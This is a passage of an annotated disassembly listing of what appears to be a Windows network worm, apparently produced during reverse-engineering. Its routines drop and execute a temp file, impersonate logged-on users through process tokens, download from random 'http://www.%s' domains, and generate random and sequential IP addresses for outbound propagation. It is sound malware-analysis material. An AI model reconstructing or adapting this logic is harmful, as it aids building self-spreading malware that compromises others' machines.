loc_9AD2FC: ; CODE XREF: sub_9AD2C5+30�j
cmp al, 5Ah
jnz short loc_9AD305
mov byte ptr [ecx], 41h
jmp short loc_9AD309
; ---------------------------------------------------------------------------
loc_9AD305: ; CODE XREF: sub_9AD2C5+39�j
inc al
mov [ecx], al
loc_9AD309: ; CODE XREF: sub_9AD2C5+35�j
; sub_9AD2C5+3E�j
inc ecx
dec esi
jnz short loc_9AD2F0
pop esi
loc_9AD30E: ; CODE XREF: sub_9AD2C5+20�j
xor eax, eax
inc eax
retn
sub_9AD2C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_check_string_format_is_http_url(char *Str1)
sub_check_string_format_is_http_url proc near ; CODE XREF: sub_9A9067+38�p
Str = byte ptr -8
var_4 = dword ptr -4
Str1 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_9A26A4
mov dword ptr [ebp+Str], eax
mov eax, dword_9A26A8
push esi
mov esi, [ebp+Str1]
mov [ebp+var_4], eax
push 7 ; MaxCount
lea eax, [ebp+Str]
push eax ; Str
push esi ; Str1
call ds:_strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9AD343
xor eax, eax
jmp short loc_9AD3A4
; ---------------------------------------------------------------------------
loc_9AD343: ; CODE XREF: sub_check_string_format_is_http_url+2B�j
push ebx
push edi
lea ebx, [esi+7]
push 3Ah ; Val
push ebx ; Str
call ds:strchr
test eax, eax
pop ecx
pop ecx
jz short loc_9AD35B
sub eax, ebx
jmp short loc_9AD362
; ---------------------------------------------------------------------------
loc_9AD35B: ; CODE XREF: sub_check_string_format_is_http_url+43�j
push ebx ; Str
call strlen
pop ecx
loc_9AD362: ; CODE XREF: sub_check_string_format_is_http_url+47�j
mov edi, eax
lea eax, [edi+1]
push eax ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AD3A2
lea eax, [edi+1]
push eax ; Count
push ebx ; Source
push esi ; Dest
call ds:strncpy
add esp, 0Ch
push esi ; cp
mov byte ptr [esi+edi], 0
call ds:__imp_inet_addr
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_9AD399
xor edi, edi
loc_9AD399: ; CODE XREF: sub_check_string_format_is_http_url+83�j
push esi ; hMem
call ds:GlobalFree
mov eax, edi
loc_9AD3A2: ; CODE XREF: sub_check_string_format_is_http_url+62�j
pop edi
pop ebx
loc_9AD3A4: ; CODE XREF: sub_check_string_format_is_http_url+2F�j
pop esi
leave
retn
sub_check_string_format_is_http_url endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_call_create_process(LPSTR lpCommandLine,int)
sub_call_create_process proc near ; CODE XREF: sub_run_dll+137�p
; sub_attach_to_explorer+C4�p ...
StartupInfo = _STARTUPINFOA ptr -54h
hObject = _PROCESS_INFORMATION ptr -10h
lpCommandLine = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
xor edx, edx
xor eax, eax
mov [ebp+hObject.hProcess], edx
push 10h
lea edi, [ebp+hObject.hThread]
stosd
stosd
stosd
pop ecx
xor eax, eax
mov [ebp+StartupInfo.cb], 44h
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
mov eax, [ebp+arg_4]
xor edi, edi
inc edi
xor esi, esi
neg eax
sbb eax, eax
and eax, 5
mov [ebp+StartupInfo.wShowWindow], ax
lea eax, [ebp+hObject]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push edx ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
mov [ebp+StartupInfo.dwFlags], edi
push edx ; lpApplicationName
call ds:CreateProcessA
test eax, eax
jz short loc_9AD411
push [ebp+hObject.hProcess] ; hObject
mov esi, ds:CloseHandle
call esi ; CloseHandle
push [ebp+hObject.hThread] ; hObject
call esi ; CloseHandle
mov esi, edi
loc_9AD411: ; CODE XREF: sub_call_create_process+56�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_call_create_process endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_Impersonate_loggedon_user_for_process proc near ; CODE XREF: sub_impersonate_loggedon_and_get_workstation_info+6�p
; sub_9ABB9F+20�p
hObject = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push offset dword_9A14B0 ; Str2
xor ebx, ebx
call sub_find_process_handle_by_name
cmp eax, ebx
pop ecx
jz short loc_9AD46E
push edi
push eax ; dwProcessId
push ebx ; bInheritHandle
push 410h ; dwDesiredAccess
call ds:OpenProcess
mov edi, eax
cmp edi, ebx
jz short loc_9AD46D
push esi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 0Eh ; DesiredAccess
push edi ; ProcessHandle
call ds:OpenProcessToken
test eax, eax
mov esi, ds:CloseHandle
jz short loc_9AD469
push [ebp+hObject] ; hToken
call ds:ImpersonateLoggedOnUser
push [ebp+hObject] ; hObject
mov ebx, eax
call esi ; CloseHandle
loc_9AD469: ; CODE XREF: sub_Impersonate_loggedon_user_for_process+40�j
push edi ; hObject
call esi ; CloseHandle
pop esi
loc_9AD46D: ; CODE XREF: sub_Impersonate_loggedon_user_for_process+28�j
pop edi
loc_9AD46E: ; CODE XREF: sub_Impersonate_loggedon_user_for_process+14�j
mov eax, ebx
pop ebx
leave
retn
sub_Impersonate_loggedon_user_for_process endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_create_process_for_validated_file(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite)
sub_create_process_for_validated_file proc near ; CODE XREF: sub_check_signature_and_create_process_from_file+90�p
; sub_validate_file_and_create_process+38�p
FileName = byte ptr -210h
PathName = byte ptr -10Ch
var_9 = byte ptr -9
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push ebx
push esi
push edi
mov ebx, 104h
push ebx ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA
mov esi, ds:GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push 0 ; uUnique
mov edi, offset PrefixString ; "ror"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9AD4E4
lea eax, [ebp+PathName]
push eax ; lpBuffer
push ebx ; nBufferLength
call ds:GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
xor ebx, ebx
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_9], 0
call esi ; GetTempFileNameA
jmp short loc_9AD4E6
; ---------------------------------------------------------------------------
loc_9AD4E4: ; CODE XREF: sub_create_process_for_validated_file+47�j
xor ebx, ebx
loc_9AD4E6: ; CODE XREF: sub_create_process_for_validated_file+6F�j
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AD54B
mov esi, [ebp+nNumberOfBytesToWrite]
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], ebx
push edi ; hFile
call ds:WriteFile
push edi ; hObject
call ds:CloseHandle
cmp [ebp+NumberOfBytesWritten], esi
lea eax, [ebp+FileName]
jnz short loc_9AD544
push ebx ; int
push eax ; lpCommandLine
call sub_call_create_process
test eax, eax
pop ecx
pop ecx
jz short loc_9AD54B
mov [ebp+var_4], 1
jmp short loc_9AD54B
; ---------------------------------------------------------------------------
loc_9AD544: ; CODE XREF: sub_create_process_for_validated_file+B9�j
push eax ; lpFileName
call ds:DeleteFileA
loc_9AD54B: ; CODE XREF: sub_create_process_for_validated_file+91�j
; sub_create_process_for_validated_file+C6�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_create_process_for_validated_file endp
; =============== S U B R O U T I N E =======================================
sub_package_succesfully_downloaded_set_to_0_if_1 proc near ; CODE XREF: sub_9AD6D4+7A�p
push 1 ; Comperand
push 0 ; Exchange
push offset Destination ; Destination
call ds:InterlockedCompareExchange
dec eax
neg eax
sbb eax, eax
inc eax
retn
sub_package_succesfully_downloaded_set_to_0_if_1 endp
; =============== S U B R O U T I N E =======================================
sub_package_succesfully_downloaded_set_to_1_if_0 proc near ; CODE XREF: StartAddress+1D3�p
; sub_download_file_from_url+3A�p
push esi
mov esi, ds:InterlockedCompareExchange
push edi
mov edi, offset Destination
jmp short loc_9AD580
; ---------------------------------------------------------------------------
loc_9AD578: ; CODE XREF: sub_package_succesfully_downloaded_set_to_1_if_0+21�j
push 64h ; dwMilliseconds
call ds:Sleep
loc_9AD580: ; CODE XREF: sub_package_succesfully_downloaded_set_to_1_if_0+D�j
push 0 ; Comperand
push 1 ; Exchange
push edi ; Destination
call esi ; InterlockedCompareExchange
cmp eax, 1
jnz short loc_9AD578
pop edi
pop esi
retn
sub_package_succesfully_downloaded_set_to_1_if_0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_call_download_file_from_url proc near ; CODE XREF: sub_call_call_download_file_from_url:loc_9AD663�p
; sub_call_call_download_file_from_url:loc_9AD67E�p
szUrl = byte ptr -2Ch
var_D = byte ptr -0Dh
dwFlags = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push edi
xor edi, edi
call ds:rand
push 5
pop ecx
xor edx, edx
div ecx
lea eax, [ebp+szUrl]
push off_9BAAB4[edx*4]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 10h
push edi ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
mov [ebp+var_D], 0
call ds:InternetGetConnectedState
test eax, eax
jz short loc_9AD622
push ebx
push esi
mov esi, ds:GetTickCount
mov [ebp+var_4], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
push 1 ; int
lea eax, [ebp+var_4]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
call sub_download_file_from_URL
add esp, 0Ch
mov ebx, eax
call esi ; GetTickCount
mov esi, eax
sub esi, [ebp+var_8]
test ebx, ebx
jz short loc_9AD620
push ebx ; hMem
call ds:GlobalFree
test esi, esi
jz short loc_9AD620
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9AD620
xor edx, edx
div esi
mov edi, eax
imul edi, 3E8h
loc_9AD620: ; CODE XREF: sub_call_download_file_from_url+71�j
; sub_call_download_file_from_url+7C�j ...
pop esi
pop ebx
loc_9AD622: ; CODE XREF: sub_call_download_file_from_url+42�j
mov eax, edi
pop edi
leave
retn
sub_call_download_file_from_url endp
; =============== S U B R O U T I N E =======================================
sub_call_call_download_file_from_url proc near ; CODE XREF: sub_9AD831+A�p
; sub_9AD831+28�p
var_C = dword ptr -0Ch
dwFlags = dword ptr -8
var_4 = dword ptr -4
sub esp, 0Ch
push ebx
push ebp
xor ebx, ebx
push ebx ; dwReserved
lea eax, [esp+18h+dwFlags]
push eax ; lpdwFlags
xor ebp, ebp
call ds:InternetGetConnectedState
test eax, eax
jz loc_9AD6CC
mov al, byte ptr [esp+14h+dwFlags]
and al, 1
neg al
push esi
mov esi, ds:Sleep
push edi
mov edi, 0BB8h
sbb eax, eax
and eax, 0FFFFFFA4h
add eax, 64h
mov ebp, eax
loc_9AD663: ; CODE XREF: sub_call_call_download_file_from_url+50�j
call sub_call_download_file_from_url
test eax, eax
mov [esp+1Ch+var_4], eax
jnz short loc_9AD679
push edi ; dwMilliseconds
call esi ; Sleep
inc ebx
cmp ebx, 5
jl short loc_9AD663
loc_9AD679: ; CODE XREF: sub_call_call_download_file_from_url+47�j
and [esp+1Ch+var_C], 0
loc_9AD67E: ; CODE XREF: sub_call_call_download_file_from_url+6E�j
call sub_call_download_file_from_url
mov ebx, eax
test ebx, ebx
jnz short loc_9AD697
push edi ; dwMilliseconds
call esi ; Sleep
inc [esp+1Ch+var_C]
cmp [esp+1Ch+var_C], 5
jl short loc_9AD67E
loc_9AD697: ; CODE XREF: sub_call_call_download_file_from_url+60�j
mov eax, [esp+1Ch+var_4]
test eax, eax
pop edi
pop esi
jz short loc_9AD6CC
test ebx, ebx
jz short loc_9AD6CC
add eax, ebx
push 6
shr eax, 1
xor edx, edx
pop ecx
div ecx
push 2Ch
xor edx, edx
pop ecx
div ecx
mov ebp, eax
mov eax, 190h
cmp ebp, eax
jbe short loc_9AD6C4
mov ebp, eax
loc_9AD6C4: ; CODE XREF: sub_call_call_download_file_from_url+99�j
cmp ebp, 8
jnb short loc_9AD6CC
push 8
pop ebp
loc_9AD6CC: ; CODE XREF: sub_call_call_download_file_from_url+17�j
; sub_call_call_download_file_from_url+78�j ...
mov eax, ebp
pop ebp
pop ebx
add esp, 0Ch
retn
sub_call_call_download_file_from_url endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD6D4(LPVOID)
sub_9AD6D4 proc near ; DATA XREF: sub_9AD831+58�o
var_2C = dword ptr -2Ch
dwFlags = dword ptr -28h
Size = dword ptr -24h
Src = dword ptr -20h
hostlong = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 1Ch
push offset stru_9A44A0
call __SEH_prolog
mov ebx, [ebp+arg_0]
push offset Addend ; lpAddend
call ds:InterlockedIncrement
cmp dword_9BB2B0, eax
jb loc_9AD81C
and [ebp+ms_exc.disabled], 0
call sub_call_srand_with_seed_from_thread_id
push dword ptr [ebx+10h]
push dword ptr [ebx+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9AA646
add esp, 10h
test eax, eax
jz loc_9AD818
mov edi, 102h
mov esi, ds:WaitForSingleObject
loc_9AD72C: ; CODE XREF: sub_9AD6D4+11A�j
; sub_9AD6D4+12D�j
push 0 ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jnz loc_9AD806
loc_9AD73A: ; CODE XREF: sub_9AD6D4+106�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jz loc_9AD7E0
call sub_package_succesfully_downloaded_set_to_0_if_1
test eax, eax
jz short loc_9AD764
push [ebp+Size] ; Size
push [ebp+Src] ; Src
call sub_9A8F60
pop ecx
pop ecx
loc_9AD764: ; CODE XREF: sub_9AD6D4+81�j
; sub_9AD6D4+A8�j ...
call ds:rand
mov word ptr [ebp+hostlong], ax
call ds:rand
mov word ptr [ebp+hostlong+2], ax
cmp byte ptr [ebp+hostlong], 0Bh
jb short loc_9AD764
cmp byte ptr [ebp+hostlong], 0F0h
ja short loc_9AD764
cmp byte ptr [ebp+hostlong+1], 0FEh
ja short loc_9AD764
cmp al, 0FEh
ja short loc_9AD764
cmp byte ptr [ebp+hostlong+3], 1
jb short loc_9AD764
cmp byte ptr [ebp+hostlong+3], 0FEh
ja short loc_9AD764
push [ebp+hostlong]
call sub_check_for_IP_pattern
pop ecx
test eax, eax
jz short loc_9AD764
push [ebp+hostlong]
call sub_check_value_of_hostlong
pop ecx
test eax, eax
jz short loc_9AD764
mov eax, [ebp+hostlong]
mov [ebp+var_2C], eax
cmp eax, [ebx+4]
jz short loc_9AD7CE
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; hostlong
call sub_9AABAE
add esp, 0Ch
loc_9AD7CE: ; CODE XREF: sub_9AD6D4+E9�j
push dwMilliseconds ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz loc_9AD73A
loc_9AD7E0: ; CODE XREF: sub_9AD6D4+74�j
; sub_9AD6D4+12B�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jnz loc_9AD72C
push 3E8h ; dwMilliseconds
push dword ptr [ebx] ; hHandle
call esi ; WaitForSingleObject
cmp eax, edi
jz short loc_9AD7E0
jmp loc_9AD72C
; ---------------------------------------------------------------------------
loc_9AD806: ; CODE XREF: sub_9AD6D4+60�j
push [ebp+Src] ; hMem
call ds:GlobalFree
jmp short loc_9AD818
; ---------------------------------------------------------------------------
loc_9AD811: ; DATA XREF: .text:stru_9A44A0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AD815: ; DATA XREF: .text:stru_9A44A0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AD818: ; CODE XREF: sub_9AD6D4+47�j
; sub_9AD6D4+13B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9AD81C: ; CODE XREF: sub_9AD6D4+20�j
push offset Addend ; lpAddend
call ds:InterlockedDecrement
xor eax, eax
call __SEH_epilog
retn 4
sub_9AD6D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD831(LPVOID)
sub_9AD831 proc near ; DATA XREF: sub_outbound_propagation+369�o
ThreadId = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
call sub_call_srand_with_seed_from_thread_id
call sub_call_call_download_file_from_url
mov edi, [ebp+ThreadId]
jmp short loc_9AD85E
; ---------------------------------------------------------------------------
loc_9AD845: ; CODE XREF: sub_9AD831+31�j
push 3E8h ; dwMilliseconds
push dword ptr [edi] ; hHandle
call ds:WaitForSingleObject
cmp eax, 102h
jnz short loc_9AD8B4
call sub_call_call_download_file_from_url
loc_9AD85E: ; CODE XREF: sub_9AD831+12�j
mov esi, eax
test esi, esi
jz short loc_9AD845
push ebx
push 3
pop ecx
xor edx, edx
div ecx
push eax ; Value
push offset Target ; Target
call ds:InterlockedExchange
test esi, esi
mov ebx, ds:CloseHandle
jbe short loc_9AD89E
loc_9AD882: ; CODE XREF: sub_9AD831+6B�j
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push edi ; lpParameter
push offset sub_9AD6D4 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ebx ; CloseHandle
dec esi
jnz short loc_9AD882
loc_9AD89E: ; CODE XREF: sub_9AD831+4F�j
push 0FFFFFFFFh ; dwMilliseconds
push dword ptr [edi] ; hHandle
call ds:WaitForSingleObject
push dword ptr [edi] ; hObject
call ebx ; CloseHandle
push edi ; hMem
call ds:GlobalFree
pop ebx
loc_9AD8B4: ; CODE XREF: sub_9AD831+26�j
pop edi
xor eax, eax
pop esi
pop ebp
retn 4
sub_9AD831 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AD8BC(LPVOID)
sub_9AD8BC proc near ; DATA XREF: sub_9ADA44+10C�o
; sub_outbound_propagation+20F�o
var_30 = dword ptr -30h
dwFlags = dword ptr -2Ch
Size = dword ptr -28h
Src = dword ptr -24h
hostlong = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 20h
push offset stru_9A44B0
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_30], esi
push offset Addend ; lpAddend
call ds:InterlockedIncrement
cmp dword_9BB2B0, eax
jb loc_9ADA20
and [ebp+ms_exc.disabled], 0
call sub_call_srand_with_seed_from_thread_id
mov ebx, 102h
mov edi, ds:WaitForSingleObject
loc_9AD8F9: ; CODE XREF: sub_9AD8BC+14A�j
mov eax, [esi+8]
mov [ebp+hostlong], eax
push dword ptr [esi+10h]
push dword ptr [esi+4]
lea eax, [ebp+Size]
push eax
lea eax, [ebp+Src]
push eax
call sub_9AA646
add esp, 10h
test eax, eax
jz loc_9AD9C6
and [ebp+var_1C], 0
loc_9AD921: ; CODE XREF: sub_9AD8BC+E9�j
; sub_9AD8BC+FC�j
push 0 ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz loc_9AD9BD
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb loc_9AD9BD
loc_9AD93B: ; CODE XREF: sub_9AD8BC+D9�j
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jz short loc_9AD997
mov eax, [ebp+var_1C]
cmp eax, [esi+0Ch]
jnb short loc_9AD997
push [ebp+hostlong] ; hostlong
call htonl
inc eax
push eax ; hostlong
call htonl_0
mov [ebp+hostlong], eax
cmp eax, [esi+4]
jz short loc_9AD992
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push eax ; hostlong
call sub_9AABAE
add esp, 0Ch
cmp dword ptr [esi+14h], 0
mov eax, dwMilliseconds
jnz short loc_9AD989
mov eax, dword_9BAAB0
loc_9AD989: ; CODE XREF: sub_9AD8BC+C6�j
push eax ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9AD997
loc_9AD992: ; CODE XREF: sub_9AD8BC+AC�j
inc [ebp+var_1C]
jmp short loc_9AD93B
; ---------------------------------------------------------------------------
loc_9AD997: ; CODE XREF: sub_9AD8BC+8D�j
; sub_9AD8BC+95�j ...
push 0 ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call ds:InternetGetConnectedState
test eax, eax
jnz loc_9AD921
push 3E8h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz short loc_9AD997
jmp loc_9AD921
; ---------------------------------------------------------------------------
loc_9AD9BD: ; CODE XREF: sub_9AD8BC+6D�j
; sub_9AD8BC+79�j
push [ebp+Src] ; hMem
call ds:GlobalFree
loc_9AD9C6: ; CODE XREF: sub_9AD8BC+5B�j
cmp dword ptr [esi+14h], 0
jz short loc_9AD9D7
push offset dword_9BB2C0 ; lpAddend
call ds:InterlockedDecrement
loc_9AD9D7: ; CODE XREF: sub_9AD8BC+10E�j
push 36EE80h ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jnz short loc_9ADA0C
cmp dword ptr [esi+14h], 0
jnz short loc_9ADA0C
call ds:rand
cdq
push 1Eh
pop ecx
idiv ecx
add edx, 3Ch
imul edx, 0EA60h
push edx ; dwMilliseconds
push dword ptr [esi] ; hHandle
call edi ; WaitForSingleObject
cmp eax, ebx
jz loc_9AD8F9
loc_9ADA0C: ; CODE XREF: sub_9AD8BC+126�j
; sub_9AD8BC+12C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9ADA20
; ---------------------------------------------------------------------------
loc_9ADA12: ; DATA XREF: .text:stru_9A44B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9ADA16: ; DATA XREF: .text:stru_9A44B0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_9ADA20: ; CODE XREF: sub_9AD8BC+23�j
; sub_9AD8BC+154�j
push offset Addend ; lpAddend
call ds:InterlockedDecrement
push dword ptr [esi] ; hObject
call ds:CloseHandle
push esi ; hMem
call ds:GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AD8BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ADA44 proc near ; CODE XREF: sub_process_http_request_and_serve_dll_file+3C5�p
Name = byte ptr -2Ch
var_D = byte ptr -0Dh
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_4]
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jnz short loc_9ADA66
mov eax, dword_9BB2B8
mov [ebp+arg_4], eax
mov eax, dword_9BB2BC
jmp short loc_9ADA6B
; ---------------------------------------------------------------------------
loc_9ADA66: ; CODE XREF: sub_9ADA44+11�j
mov eax, dword_9BB2F4
loc_9ADA6B: ; CODE XREF: sub_9ADA44+20�j
push esi
mov esi, [ebp+arg_0]
push esi
mov [ebp+var_8], eax
call sub_check_for_IP_pattern
test eax, eax
pop ecx
jz loc_9ADB80
push [ebp+arg_4]
call sub_check_for_IP_pattern
test eax, eax
pop ecx
jz loc_9ADB80
push esi
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jz loc_9ADB80
push [ebp+arg_4]
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jz loc_9ADB80
mov al, byte ptr [ebp+arg_0+2]
push ebx
xor ebx, ebx
cmp al, 0Ah
mov [ebp+var_4], esi
jb short loc_9ADACB
sub al, 0Ah
mov esi, 0AF5h
mov byte ptr [ebp+var_4+2], al
jmp short loc_9ADAD8
; ---------------------------------------------------------------------------
loc_9ADACB: ; CODE XREF: sub_9ADA44+79�j
movzx esi, al
inc esi
imul esi, 0FFh
mov byte ptr [ebp+var_4+2], bl
loc_9ADAD8: ; CODE XREF: sub_9ADA44+85�j
push edi
push esi
mov byte ptr [ebp+var_4+3], bl
push [ebp+var_4]
lea eax, [ebp+Name]
push [ebp+arg_4]
push offset aN08x08x08x ; "n%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_D], bl
call ds:CreateEventA
mov edi, eax
cmp edi, ebx
jz short loc_9ADB7E
call ds:GetLastError
cmp eax, 0B7h
jz short loc_9ADB77
push offset dword_9BB2C0 ; lpAddend
call ds:InterlockedIncrement
cmp Target, eax
jl short loc_9ADB6C
push 18h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_4]
mov [eax+8], ecx
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD8BC ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
mov [eax], edi
mov [eax+0Ch], esi
mov dword ptr [eax+14h], 1
call ds:CreateThread
push eax
jmp short loc_9ADB78
; ---------------------------------------------------------------------------
loc_9ADB6C: ; CODE XREF: sub_9ADA44+E8�j
push offset dword_9BB2C0 ; lpAddend
call ds:InterlockedDecrement
loc_9ADB77: ; CODE XREF: sub_9ADA44+D5�j
push edi ; hObject
loc_9ADB78: ; CODE XREF: sub_9ADA44+126�j
call ds:CloseHandle
loc_9ADB7E: ; CODE XREF: sub_9ADA44+C8�j
pop edi
pop ebx
loc_9ADB80: ; CODE XREF: sub_9ADA44+37�j
; sub_9ADA44+48�j ...
pop esi
leave
retn
sub_9ADA44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_check_time_last_input(LPVOID)
sub_check_time_last_input proc near ; DATA XREF: sub_outbound_scans+15�o
plii = tagLASTINPUTINFO ptr -8
push ecx
push ecx
push ebx
push ebp
push esi
mov esi, ds:InterlockedExchange
push edi
mov ebp, offset dwMilliseconds
mov ebx, offset dword_9BAAB0
loc_9ADB99: ; CODE XREF: sub_check_time_last_input+6C�j
xor eax, eax
mov [esp+18h+plii.cbSize], 8
lea edi, [esp+18h+plii.dwTime]
stosd
lea eax, [esp+18h+plii]
push eax ; plii
call ds:GetLastInputInfo
test eax, eax
jz short loc_9ADBE4
call ds:GetTickCount
sub eax, [esp+18h+plii.dwTime]
cmp eax, 493E0h
jnb short loc_9ADBD7
push 7D0h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 0C8h
jmp short loc_9ADBE1
; ---------------------------------------------------------------------------
loc_9ADBD7: ; CODE XREF: sub_check_time_last_input+43�j
push 3E8h ; Value
push ebp ; Target
call esi ; InterlockedExchange
push 64h ; Value
loc_9ADBE1: ; CODE XREF: sub_check_time_last_input+52�j
push ebx ; Target
call esi ; InterlockedExchange
loc_9ADBE4: ; CODE XREF: sub_check_time_last_input+32�j
push 2710h ; dwMilliseconds
call ds:Sleep
jmp short loc_9ADB99
sub_check_time_last_input endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_outbound_propagation(LPVOID)
sub_outbound_propagation proc near ; DATA XREF: sub_outbound_scans+2D�o
var_1850 = byte ptr -1850h
var_184C = byte ptr -184Ch
in = in_addr ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
ThreadId = dword ptr -50h
var_4C = byte ptr -4Ch
Name = byte ptr -48h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1850h
call __alloca_probe
push ebx
push esi
push edi
